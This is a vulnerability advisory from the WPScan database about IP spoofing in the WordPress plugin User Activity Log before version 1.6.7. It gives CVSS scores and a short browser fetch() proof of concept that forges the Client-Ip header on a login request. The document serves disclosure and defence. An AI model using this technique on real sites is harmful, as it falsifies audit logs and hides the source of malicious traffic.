Lucene search

K
wpvulndbBartlomiej MarekWPVDB-ID:2BD2579E-B383-4D12-B207-6FC32CFB82BC
HistoryAug 14, 2023 - 12:00 a.m.

User Activity Log < 1.6.7 - IP Spoofing

2023-08-1400:00:00
Bartlomiej Marek
wpscan.com
6
ip spoofing
user activity log
untrusted headers
malicious traffic

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:N/I:P/A:N

0.0005 Low

EPSS

Percentile

15.1%

Description This plugin retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.

PoC

1. In User Activity Log > Settings, enable the setting “Allow Ip Address of users to log.” and save settings. 2. Run the following code in the web browser and note on the backend that the IP address has been faked. await fetch(“/wp-login.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, “Client-Ip”: “8.8.8.8”, }, “body”: “log=USERNAME&pwd;=PASSWORD”, “method”: “POST”, “mode”: “cors”, “credentials”: “include” });

CPENameOperatorVersion
eq1.6.7

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:N/I:P/A:N

0.0005 Low

EPSS

Percentile

15.1%

Related for WPVDB-ID:2BD2579E-B383-4D12-B207-6FC32CFB82BC